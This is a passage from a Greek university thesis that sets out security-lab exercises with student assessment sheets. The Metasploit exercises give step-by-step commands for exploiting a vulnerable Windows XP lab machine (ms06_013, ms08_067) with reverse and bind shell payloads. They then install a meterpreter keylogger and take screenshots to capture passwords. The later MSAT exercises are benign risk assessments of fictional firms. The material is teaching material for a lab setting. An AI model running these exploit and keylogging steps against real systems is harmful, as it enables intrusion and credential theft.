ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

METASPLOIT

Εργαλείο METASPLOIT Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation) Τύπος Άσκησης Τεχνική Βαθμός Δυσκολίας 1 Συμμετοχή Ομάδες 2 ατόμων Ώρες Διδασκαλίας 45 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τη χρήση του εργαλείου και των δυνατοτήτων του. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με: • τη λειτουργία των exploits και των payloads • του τρόπου με τον οποίο μπορεί κάποιος επιτιθέμενος να αποκτήσει πρόσβαση σε ένα

απομακρυσμένο μηχάνημα • την εκμετάλλευση γνωστών ευπαθειών των εφαρμογών Περιγραφή Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη συνέχεια θα εκκινήσουν το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Penetration->All->msfgui. Από τη γραμμή αναζήτησης θα πρέπει να εντοπίσουν κάποιο exploit που είναι κατάλληλο για τα Windows XP SP2. Προτείνεται να χρησιμοποιηθεί το ms06_013_createtextrange. Με διπλό κλικ στο ex plo it πο υ επιλέχθηκε ανοίγει νέο παράθυρο από ό πο υ θα γίνει η επιλογή του στόχου και του payload. Προτείνεται να χρησιμοποιηθεί το windows/shell/bind_tcp payload. Αφού επιλεγεί το μηχάνημα στόχος και εκτελεστεί επιτυχημένα το exploit, στο γραφικό περιβάλλον του msf θα εμφανιστεί η τρέχουσα εργασία και η τρέχουσα σύνοδος που θα υποδηλώνουν την επιτυχημένη εκμετάλλευση του στόχου. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 234: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

234 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Metasploit

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Περιγράψτε τη λειτουργία του exploit: ms06_013_createtextrange.

2. Περιγράψτε τη λειτουργία του payload: windows/shell/bind_tcp;

3. Τι δυνατότητες σας παρέχει το επιτυχημένο exploitation του μηχανήματος στόχου;

4. Περιγράψτε τουλάχιστον δυο κακόβουλες ενέργειες που μπορείτε να πραγματοποιήσετε στο

μηχάνημα στόχο;

Page 235: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

235 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.5.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

METASPLOIT

Εργαλείο METASPLOIT

Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εκμετάλλευση μιας γνωστής ευπάθειας ενός

υπολογιστικού συστήματος. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να

κατανοήσουν έννοιες σχετικά με:

• την αξιοποίηση των αποτελεσμάτων που παράγει ένα εργαλείο εντοπισμού ευπαθειών

• του τρόπου με τον οποίο μπορεί να εκμεταλλευτεί μια ευπάθεια

• των συνεπειών που μπορεί να επιφέρει σε ένα υπολογιστικό σύστημα

Περιγραφή

Αρχικά θα πραγματοποιηθεί σάρωση του εικονικού δικτύου με το εργαλείο NESSUS για να

εντοπιστούν πιθανές ευπάθειες στα υπολογιστικά του συστήματα. Εναλλακτικά μπορεί να

χρησιμοποιηθεί μια έτοιμη αναφορά αναζήτησης ευπαθειών που έχει παραχθεί από

προηγούμενη άσκηση. Από την αναφορά της σάρωσης με το NESSUS προσδιορίζεται η

ευπάθεια του συστήματος την οποία θα εκμεταλλευτούμε. Στη συνέχεια οι φοιτητές θα

πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη

δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό και πληκτρολογώντας

ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη συνέχεια θα εκκινήσουν

το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν

BackTrack->Penetration->All->msfconsole. Από εκεί θα πρέπει να επιλεγεί

το κατάλληλο exploit για την ευπάθεια στην οποία θα γίνει η εκμετάλλευση (το exploit έχει

το ίδιο όνομα με την ευπάθεια). Με την εντολή show exploits εμφανίζεται μια λίστα

των διαθέσιμων exploits από την ο πο ία θα πρέπει να επιλεγεί το κατάλληλο για την

ευπάθεια exploit. Έπειτα με την εντολή use όνομα_exploit γίνεται χρήση του exploit.

Page 236: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

236 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Με την εντολή show options εμφανίζονται επιλογές του Module. Καθορίζουμε ποιο

είναι το μηχάνημα στόχος μέσω της εντολής set RHOST ip_address και

προσδιορίζεται το Payload που θα χρησιμοποιηθεί μέσω της εντολής set payload

windows/*****/****** (π.χ. set payload windows/meterpreter

/reverse_tcp).

Με την εντολή show options εμφανίζονται επιλογές του Payload. Ορίζεται ο το

μηχάνημα από το οποίο θα εκτελούνται οι εντολές μέσω της εντολής set LHOST

ip_address. Ελέγχεται αν έχουν τεθεί σωστά όλες οι ρυθμίσεις μέσω της επιλογής

show options (ενδεχομένως να υπάρχουν και άλλες ρυθμίσεις που θα πρέπει να γίνουν

ανάλογα με το exploit που θα χρησιμοποιηθεί) ενώ στη συνέχεια με την εντολή exploit

πραγματοποιείται η εκμετάλλευση της ευπάθειας στο μηχάνημα στόχο. Με την εντολή

help εμφανίζονται οι ενέργειες που μπορούν να πραγματοποιηθούν στο μηχάνημα στόχο.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 237: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

237 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Metasploit

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Προσδιορίστε την ευπάθεια την οποία θα εκμεταλλευτείτε; Αιτιολογήστε την επιλογή σας.

2. Προσδιορίστε το exploit που θα χρησιμοποιήσετε; Τι συνέπειες θα επιφέρει στο μηχάνημα στόχο;

3. Ποιο payload επιλέξατε να χρησιμοποιήσετε; Αιτιολογήστε την επιλογή σας.

4. Το επιτυχημένο exploit του μηχανήματος στόχου ποιες κακόβουλες ενέργειες επιτρέπει στον

επιτιθέμενο να πραγματοποιήσει;

5. Αν ήσασταν ο υπεύθυνος ασφάλειας πως θα διορθώνατε αυτή την ευπάθεια για να αποτρέψετε την

εκμετάλλευσή της από κάποιον επιτιθέμενο;

Page 238: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

238 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.5.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

METASPLOIT

Εργαλείο METASPLOIT

Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η παρουσίαση μιας μεθόδου συλλογής πληροφοριών από ένα πληροφοριακό σύστημα με τη χρήση keylogger, μέσω της εκμετάλλευσης μιας ευπάθειας. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με:

• τις μεθόδους εκμετάλλευσης ευπαθειών από έναν επιτιθέμενο

• τις επιπτώσεις που μπορεί να έχει η επιτυχημένη εκμετάλλευση μιας ευπάθειας για το ΠΣ

• την επικινδυνότητα των keyloggers Περιγραφή Σε αυτή την άσκηση θα πρέπει οι φοιτητές να εκμεταλλευτούν μια ευπάθεια ενός υπολογιστή του δικτύου και να εγκαταστήσουν σε αυτόν ένα keylogger με σκοπό να υποκλέψουν συνθηματικά και στιγμιότυπα από την επιφάνεια εργασίας του χρήστη. Για το σκοπό αυτό θα χρησιμοποιηθεί το Metasploit για να δημιουργηθεί μια σύνοδος με τον υπολογιστή θύμα μέσω της επιτυχημένης εκμετάλλευσης μιας ευπάθειάς του. Για τον εντοπισμό της ευπάθειας μπορεί να χρησιμοποιηθεί μια από τις παρακάτω μεθόδους:

• η τυχαία δοκιμή διαφόρων, πιθανών για το σύστημα στόχο, exploits του Metasploit

• η εκμετάλλευση μιας συγκεκριμένης ευπάθειας που έχει προηγουμένως προσδιοριστεί από τη σάρωση με το εργαλείο NESSUS

• η δημιουργία μιας επιτυχημένης συνόδου με το εργαλείο Fast-Track με αξιοποίηση της

επιλογής Autopwn Automation, και τη χρήση Reverce Payload Σε αυτή την άσκηση έχει προσδιορίσει ότι στο μηχάνημα στόχος η ευπάθεια προς

εκμετάλλευση είναι η ms08_067_netapi. Εκκινείται το BackTrack 4 σε Virtual

Page 239: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

239 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Machine και ενεργοποιείται η δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα

τερματικό και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient

eth0. Στη συνέχεια εκκινείται το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγεται BackTrack->Penetration->All-

>msfconsole.

Στη συνέχεια πληκτρολογούνται οι ακόλουθες εντολές για την εκμετάλλευση της ευπάθειας: use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

set lhost ip_τοπικού υπολογιστή

set rhost ip_υπολογιστή στόχου

exploit Για να προσδιοριστούν οι υπηρεσίες που είναι ενεργές στον υπολογιστή θύμα πληκτρολογείτε η εντολή ps

Στη συνέχεια θα πρέπει να προσδιοριστεί η υπηρεσία (PID) για την οποία είναι επιθυμητή η υποκλοπή των εισαγωγών από το πληκτρολόγιο και εκκινείτε η καταγραφή με τις εντολές: Keyscan_start

Keyscan_dump PID_υπηρεσίας Στο μηχάνημα στόχο γίνεται χρήση της υπηρεσίας που έχει επιλεγεί και για την εμφάνιση των αποτελεσμάτων πληκτρολογείται και πάλι στο μηχάνημα που τρέχει το msf η εντολή: Keyscan_dump PID_υπηρεσίας Εάν είναι επιθυμητό το στιγμιότυπο μιας υπηρεσίας που εκτελείται στο απομακρυσμένο μηχάνημα χρησιμοποιούνται οι ακόλουθες εντολές: migrate PID_υπηρεσίας

use espia

screenshot / ονομα.bmp

Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο καθώς και ένα στιγμιότυπο (screenshot) από το μηχάνημα στόχο.

Page 240: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

240 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Metasploit

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Τι αποτέλεσμα είχε η επιτυχημένη εκμετάλλευση της ευπάθειας;

2. Για ποια υπηρεσία επιλέξατε να καταγράψετε την είσοδο από το πληκτρολόγιο;

3. Τι είδους πληροφορίες συλλέξατε;

4. Ποιας υπηρεσίας το στιγμιότυπο επιλέξατε να υποκλέψετε; Γιατί;

5. Προσδιορίστε το είδος των πληροφοριών που μπορεί να συλλέξει ένας επιτιθέμενος με αυτή τη

μέθοδο;

Page 241: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

241 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.6 MSAT

6.6.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MSAT

Εργαλείο MSAT

Γνωστικό Πεδίο Ανάλυση Επικινδυνότητας (Risk Analysis)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με την έννοια της αξιολόγηση

της ασφάλειας. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες

σχετικά με:

• το τι αξιολογείται στην ασφάλεια ενός ΠΣ

• ποιοι εμπλέκονται στην ασφάλεια ενός ΠΣ

• ποια τα οφέλη από την αξιολόγηση της ασφάλειας

Περιγραφή

Η αξιολόγηση αφορά το βιβλιοπωλείο Books A.E. Το βιβλιοπωλείο στεγάζεται στο ισόγειο

ενός τριώροφου κτιρίου και στο οποίο εργάζονται 10 άτομα. Τα ΠΣ του βιβλιοπωλείου

στηρίζονται σε εφαρμογές τρίτων καθώς και σε εφαρμογές του διαδικτύου. Αναλυτικότερα

το ΠΣ αποτελείται από:

Εξοπλισμός:

8 προσωπικούς υπολογιστές με λειτουργικό σύστημα Microsoft Windows ΧΡ,

3 εκτυπωτές προσωπικής χρήσης,

2 εκτυπωτές δικτύου που είναι τοποθετημένοι σε διάφορα γραφεία, καθώς και

1 εξυπηρετητής με λειτουργικό σύστημα Microsoft Windows 2003 που είναι τοποθετημένος

στο γραφείο του διευθυντή και χρησιμοποιείται για εφαρμογές, βάσεις δεδομένων,

παραγωγή αντιγράφων ασφαλείας, υπηρεσίες WWW και email.

Page 242: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

242 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εφαρμογές

EasyBookOrder, μια web εφαρμογή ηλεκτρονικού βιβλιοπωλείου

BookstoreManager, μια ERP εφαρμογή για τη διαχείριση του καταστήματος

EasyCom, για Webmail

Η δικτύωση των συστημάτων περιλαμβάνει ένα τοπικό δίκτυο (LAN). Υπάρχει σύνδεση με

το Διαδίκτυο για υπηρεσίες WWW και email. Για την προ στασία το υ δικτύου

χρησιμοποιούνται firewall και αντι-ιομορφικό λογισμικό (antivirus). Για την

αυθεντικοποίηση των χρηστών χρησιμοποιούνται ζεύγη αναγνωριστικών-συνθηματικών

(username-passwords) που καθορίζονται την εξωτερική εταιρεία η οποία είναι υπεύθυνη για

τη διαχείριση του ΠΣ. Επιπλέον, δεν έχει γίνει εκπαίδευση του προσωπικού σε θέματα

ασφάλειας ΠΣ και δεν γίνονται περιοδικοί έλεγχοι (audits).

Διευκρινίζεται ότι οι φοιτητές θα χρειαστεί να κάνουν κάποιες παραδοχές κατά το τρέξιμο

του εργαλείου.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο μαζί με την εκτύπωση της αναφοράς που παράγει το

εργαλείο.

Page 243: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

243 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MSAT

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Προσδιορίστε τα αγαθά της επιχείρησης.

2. Ποια τα αποτελέσματα του εργαλείου σε σχέση με το επιχειρηματικό προφίλ επικινδυνότητας και τα

μέτρα προστασία που έχουν ληφθεί στους επιμέρους τομείς;

3. Σε ποιους επιμέρους τομείς της επιχείρησης εντοπίζονται οι κρίσιμες ευπάθειες; Αναφέρετε

περιληπτικά.

4. Ποιες οι απειλές για την επιχείρηση και ποιες οι επιπτώσεις που μπορεί να επιφέρουν;

5. Ποια είναι τα μέτρα προστασίας που πρέπει να ληφθούν;

Page 244: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

244 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.6.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

MSAT71

Εργαλείο MSAT

Γνωστικό Πεδίο Ανάλυση Επικινδυνότητας (Risk Analysis)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η ενασχόληση των φοιτητών με την αξιολόγηση της ασφάλειας σε περισσότερο σύνθετα ΠΣ. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με:

• την αναγκαιότητα ύπαρξης πολιτικής ασφάλειας

• την εκπαίδευση των χρηστών

• την πραγματοποίηση ελέγχων ασφάλειας Περιγραφή Τα Πληροφοριακά Συστήματα (ΠΣ) της ΔΕΙΓΜΑ ΑΕ βασίζονται, κατά κύριο, λόγο στην υιοθέτηση των προτύπων και τεχνολογιών του Διαδικτύου και περιλαμβάνουν:

• 78 προσωπικούς υπολογιστές με λειτουργικό σύστημα Microsoft Windows ΧΡ,

• 20 εκτυπωτές προσωπικής χρήσης,

• 5 εκτυπωτές δικτύου που είναι τοποθετημένοι σε διάφορα γραφεία, καθώς και

• 8 εξυπηρετητές με λειτουργικό σύστημα Microsoft Windows 2003 που είναι τοποθετημένοι σε ειδικό χώρο με πυροπροστασία, κλιματισμό κλπ.

Συγκεκριμένα, υπάρχουν:

• 2 εξυπηρετητές εφαρμογών και βάσεων δεδομένων μόνο για εσωτερική χρήση,

• 1 εξυπηρετητής εφαρμογών και βάσεων δεδομένων μόνο για εξωτερική χρήση,

• 1 εξυπηρετητής WWW,

• 1 εξυπηρετητής email, 71 ΕΑΠ, Θεματική Ενότητα ΠΛΗ 35: Προστασία και Ασφάλεια Συστημάτων Υπολογιστών, 2η Γραπτή Εργασία , Ακαδημαϊκό έτος 2008-2009

Page 245: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

245 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• 2 εξυπηρετητές αρχειοθέτησης (file servers) και

• 1 εξυπηρετητής για παραγωγή αντιγράφων ασφαλείας. Οι εφαρμογές Wastro, Ocean και Desis έχουν αναπτυχθεί από εξωτερικούς προμηθευτές και αφορούν την παροχή υπηρεσιών: Webmail, ERP και CAD, αντίστοιχα. Οι ειδικές εφαρμογές Dnote, Dcalc, Dpay έχουν αναπτυχθεί από το Τμήμα Πληροφορικής της εταιρείας και αφορούν την παροχή υπηρεσιών σημειώσεων, υπολογισμών και ισοτιμιών, αντίστοιχα. Οι εξυπηρετητές και ο κεντρικός δικτυακός εξοπλισμός βρίσκονται σε κατάλληλα διαμορφωμένο χώρο με προστασία από κλοπή, υγρασία, διακοπή ρεύματος κλπ. Η δικτύωση των συστημάτων περιλαμβάνει ένα τοπικό δίκτυο (LAN) στα κεντρικά γραφεία της ΔΕΙΓΜΑ ΑΕ, με κορμό υλοποιημένο με οπτικές ίνες. Υπάρχει σύνδεση με το Διαδίκτυο για υπηρεσίες WWW και email. Επιπλέον, λειτουργεί εσωτερικό δίκτυο επικοινωνίας (intranet) που, μέσω υπηρεσιών VPN που παρέχονται από την εταιρεία τηλεπικοινωνιών Beta-ΝΕΤ, διασυνδέεται με τα τοπικά δίκτυα των περιφερειακών γραφείων της ΔΕΙΓΜΑ ΑΕ σε τρία σημεία της χώρας. Για την προστασία του εσωτερικού δικτύου χρησιμοποιούνται firewall και intrusion detection, όπως και αντι-ιομορφικό λογισμικό (antivirus). Οι υπάλληλοι και οι εξωτερικοί συνεργάτες μπορούν να συνδέονται από απόσταση (όντας εκτός των εγκαταστάσεων της εταιρείας) με τις εφαρμογές, αλλά μόνο για εξωτερική χρήση. Για την αυθεντικοποίηση των χρηστών χρησιμοποιούνται ζεύγη αναγνωριστικών-συνθηματικών (username-passwords) που καθορίζονται από το διαχειριστή συστήματος και το βοηθό του. Για την εξουσιοδότηση των χρηστών χρησιμοποιείται η προσέγγιση RBAC, όπως τη διαχειρίζεται ο διαχειριστής συστήματος, αλλά δεν έχουν ορισθεί πολιτικές ασφάλειας. Επιπλέον, δεν έχει γίνει εκπαίδευση του προσωπικού σε θέματα ασφάλειας ΠΣ και δεν γίνονται περιοδικοί έλεγχοι (audits). Διευκρινίζεται ότι οι φοιτητές θα χρειαστεί να κάνουν κάποιες παραδοχές κατά το τρέξιμο του εργαλείου. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο μαζί με την εκτύπωση της αναφοράς που παράγει το εργαλείο.

Page 246: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

246 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

MSAT

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Προσδιορίστε τα αγαθά της επιχείρησης.

2. Σε ποιους επιμέρους τομείς της επιχείρησης εντοπίζονται οι κρίσιμες ευπάθειες; Αναφέρετε

περιληπτικά.

3. Ποια κρίσιμα μέτρα προστασίας πρέπει να ληφθούν για την αντιμετώπιση των απειλών.

4. Γιατί είναι απαραίτητοι οι τακτικοί έλεγχοι ασφάλειας;

